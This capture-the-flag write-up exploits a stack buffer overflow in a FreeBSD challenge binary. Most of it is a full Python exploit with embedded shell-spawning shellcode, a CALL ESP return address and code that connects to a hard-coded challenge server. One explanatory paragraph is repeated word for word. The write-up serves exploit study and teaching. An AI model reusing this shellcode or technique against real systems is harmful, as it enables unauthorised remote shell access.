The given binary is a 32 bit FreeBSD ELF executable, statically linked. Setting up a FreeBSD 9.1 VM, I started analysing the binary. Binary requires a user ufobay and database file /home/ufobay/ufobay.db. We noticed a buffer overflow vulnerability in option 1, where it gets parcel. User can supply 256 bytes of data. 172 bytes of data can overwrite the saved EIP.
Here is the idea of exploit:
[*] Overwrite saved EIP with CALL ESP gadget
[*] Place the shellcode immediately after the CALL ESP gadget
Below is the exploit:
Here is the idea of exploit:
[*] Overwrite saved EIP with CALL ESP gadget
[*] Place the shellcode immediately after the CALL ESP gadget
Below is the exploit:
#!/usr/bin/env python import struct import socket import time # msfvenom -p bsd/x86/exec CMD='/bin/sh -c sh<&5 >&5' -a x86_64 -b '\x0a' shellcode = ( "\x6a\x3b\x58\x99\x52\x68\x2d\x63\x00\x00\x89\xe7\x52\x68" + "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\xe8\x15" + "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20" + "\x73\x68\x3c\x26\x35\x20\x3e\x26\x35\x00\x57\x53\x89\xe1" + "\x52\x51\x53\x50\xcd\x80") ret_addr = struct.pack("<I", 0x080ff46d) # call esp NOP = struct.pack("B", 0x90) EBP = struct.pack("<I", 0x0815c080) payload = NOP * 168 + EBP + ret_addr + shellcode ip = '92.63.96.226' #ip = '192.168.122.200' port = 1337 soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.connect((ip, port)) time.sleep(1) print soc.recv(1024) # option soc.send("1\n") time.sleep(0.5) print soc.recv(512) # source soc.send("A\n") time.sleep(0.5) print soc.recv(512) # destination soc.send("A\n") time.sleep(0.5) print soc.recv(512) # size soc.send(str(len(payload)) + "\n") time.sleep(0.5) print soc.recv(512) # parcel soc.send(payload + "\n") time.sleep(0.5) soc.send("cat key\n") time.sleep(0.5) print soc.recv(1024)Flag for the challenge is H0wCanW3D3F3atAL1ENZ
Could you please to share the challenge file ?
ReplyDeleteThank you very much
:)
Deletehttp://www.mediafire.com/?nj4dhguho92kqgn